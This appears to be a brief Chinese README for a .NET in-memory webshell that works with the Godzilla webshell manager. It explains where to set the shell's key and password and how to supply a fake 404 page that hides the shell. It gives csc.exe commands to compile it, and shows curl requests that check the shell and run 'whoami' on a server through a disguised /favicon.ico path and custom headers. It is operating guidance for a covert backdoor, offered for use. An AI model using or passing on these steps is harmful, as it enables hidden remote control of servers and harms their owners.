代码中需要修改的点
input_key 为Godzilla 里面的key
pass 为Godzilla 里面的pass
nodata 为自定义返回404的代码的base64字符串
另外如果需要报错log,可将log部分注释去掉查看。
exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.Web.dll,System.dll,Microsoft.CSharp.dll,System.Core.dll memshell.cs
dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.Web.dll,System.dll,Microsoft.CSharp.dll,System.Core.dll /t:library memshell.cs
使用方式可参考:DotNet内存马-HttpListener
验证:
curl http://10.211.55.4/favicon.ico -H "Type: print"
命令执行:
curl http://10.211.55.4/favicon.ico -H "Type: cmd" -d "pass=whoami"
Godzilla 添加对应HTTP头即可, AES_RAW
AES_BASE64
